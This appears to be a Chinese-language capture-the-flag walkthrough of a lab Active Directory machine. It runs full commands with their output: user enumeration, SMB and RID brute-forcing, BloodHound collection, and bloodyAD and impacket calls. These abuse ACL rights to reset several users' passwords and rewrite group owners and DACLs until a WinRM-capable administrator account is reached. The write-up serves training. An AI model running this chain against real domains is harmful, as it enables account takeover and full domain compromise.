Information #
在pdf文件中,给出了默认的用户名和密码
Nmap #
[root@Hacking] /home/kali/Evelator
❯ nmap 192.168.55.158 -A -p-
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-21 13:51:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bloodhound.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bloodhound.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
添加bloodhound.thl到/etc/hosts
Kerbrute Userenum #
进行用户枚举
[root@Hacking] /home/kali/Evelator
❯ kerbrute userenum -d bloodhound.thl --dc 192.168.55.158 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt ⏎
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/21/25 - Ronnie Flathers @ropnop
2025/08/21 21:56:12 > Using KDC(s):
2025/08/21 21:56:12 > 192.168.55.158:88
2025/08/21 21:56:14 > [+] VALID USERNAME: elevator@bloodhound.thl
2025/08/21 21:56:20 > [+] VALID USERNAME: john.smith@bloodhound.thl
2025/08/21 21:56:24 > [+] VALID USERNAME: michael.jones@bloodhound.thl
2025/08/21 21:56:56 > [+] VALID USERNAME: administrador@bloodhound.thl
NetExec SMB #
[root@Hacking] /home/kali/Evelator
❯ NetExec smb 192.168.55.158 -u 'john.smith' -p 'Rk436\#Z4&' --shares
SMB 192.168.55.158 445 ELEVATOR [*] Windows Server 2022 Build 20348 x64 (name:ELEVATOR) (domain:bloodhound.thl) (signing:True) (SMBv1:False)
SMB 192.168.55.158 445 ELEVATOR [+] bloodhound.thl\john.smith:Rk436\#Z4&
SMB 192.168.55.158 445 ELEVATOR [*] Enumerated shares
SMB 192.168.55.158 445 ELEVATOR Share Permissions Remark
SMB 192.168.55.158 445 ELEVATOR ----- ----------- ------
SMB 192.168.55.158 445 ELEVATOR ADMIN$ Admin remota
SMB 192.168.55.158 445 ELEVATOR C$ Recurso predeterminado
SMB 192.168.55.158 445 ELEVATOR E$ Recurso predeterminado
SMB 192.168.55.158 445 ELEVATOR IPC$ READ IPC remota
SMB 192.168.55.158 445 ELEVATOR NETLOGON READ Recurso compartido del servidor de inicio de sesi¢n
SMB 192.168.55.158 445 ELEVATOR SYSVOL READ Recurso compartido del servidor de inicio de sesi¢n
[root@Hacking] /home/kali/Evelator
❯ NetExec smb 192.168.55.158 -u 'john.smith' -p 'Rk436\#Z4&' --rid-brute | grep SidTypeUser
SMB 192.168.55.158 445 ELEVATOR 500: BLOODHOUND\Administrador (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 501: BLOODHOUND\Invitado (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 502: BLOODHOUND\krbtgt (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1000: BLOODHOUND\ELEVATOR$ (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1108: BLOODHOUND\michael.jones (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1109: BLOODHOUND\john.smith (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1111: BLOODHOUND\mary.johnson (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1112: BLOODHOUND\robert.williams (SidTypeUser)
SMB 192.168.55.158 445 ELEVATOR 1114: BLOODHOUND\patricia.brown (SidTypeUser)
Bloodhound #
这里直接收集好像会导致DNS超时,我用dnschef伪造了一个
[root@Hacking] /home/kali/Elevator
❯ dnschef --fakeip 192.168.55.158
[root@Hacking] /home/kali/Evelator
❯ bloodhound-python -u 'john.smith' -p 'Rk436\#Z4&' -d bloodhound.thl -dc dc.bloodhound.thl -ns 127.0.0.1 -c All --zip ⏎
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.bloodhound.thl
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.bloodhound.thl
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: elevator.bloodhound.thl
INFO: Done in 00M 00S
INFO: Compressing output into 20250821223912_bloodhound.zip
发现SMITH的一条线路,从上到下非常清晰
Addself To FINANZAS #
[root@Hacking] /home/kali/Evelator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'john.smith' -p 'Rk436\#Z4&' add groupMember FINANZAS john.smith ⏎
[+] john.smith added to FINANZAS
GenericAll To MARY #
修改mary的密码
[root@Hacking] /home/kali/Evelator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'john.smith' -p 'Rk436\#Z4&' set password MARY.JOHNSON Abc123456@ ⏎
[+] Password changed successfully!
ForceChangePassword To ROBERT #
[root@Hacking] /home/kali/Evelator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'mary.johnson' -p 'Abc123456@' set password ROBERT.WILLIAMS Abc123456@
[+] Password changed successfully!
WriteDacl #
[root@Hacking] /home/kali/Evelator
❯ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ROBERT.WILLIAMS' -target 'PATRICIA.BROWN' 'bloodhound.thl/ROBERT.WILLIAMS:Abc123456@'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250821-224850.bak
[*] DACL modified successfully!
ChangePassword To PATRICIA #
[root@Hacking] /home/kali/Elevator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'ROBERT.WILLIAMS' -p 'Abc123456@' set password PATRICIA.BROWN Abc123456@
[+] Password changed successfully!
WriteOwner To OPERACIONES #
修改拥有者
[root@Hacking] /home/kali/Elevator
❯ impacket-owneredit -action write -new-owner 'PATRICIA.BROWN' -target 'OPERACIONES' 'bloodhound.thl/PATRICIA.BROWN:Abc123456@'
/usr/share/doc/python3-impacket/examples/owneredit.py:87: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/owneredit.py:96: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:97: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:98: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/owneredit.py:100: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:101: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:102: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/owneredit.py:103: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:104: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:105: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:106: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/owneredit.py:107: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:108: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:109: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:110: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:111: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/owneredit.py:112: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:113: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-3580157585-956322742-780763674-1114
[*] - sAMAccountName: patricia.brown
[*] - distinguishedName: CN=Patricia Brown,CN=Users,DC=bloodhound,DC=thl
[*] OwnerSid modified successfully!
添加写入权限
[root@Hacking] /home/kali/Elevator
❯ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'PATRICIA.BROWN' -target-dn 'CN=OPERACIONES,OU=OPERACIONES,DC=BLOODHOUND,DC=THL' 'bloodhound.thl/PATRICIA.BROWN:Abc123456@'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250821-230110.bak
[*] DACL modified successfully!
添加自己到这个组里面
[root@Hacking] /home/kali/Elevator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'PATRICIA.BROWN' -p 'Abc123456@' add groupMember OPERACIONES PATRICIA.BROWN ⏎
[+] PATRICIA.BROWN added to OPERACIONES
GenericAll To MICHAEL #
[root@Hacking] /home/kali/Elevator
❯ bloodyAD --host dc.bloodhound.thl -d bloodhound.thl -u 'PATRICIA.BROWN' -p 'Abc123456@' set password MICHAEL.JONES Abc123456@
[+] Password changed successfully!
USER && ROOT #
MICHAEL可以winrm登录,并且在管理员组,因此可以直接进入到管理员桌面拿到flag
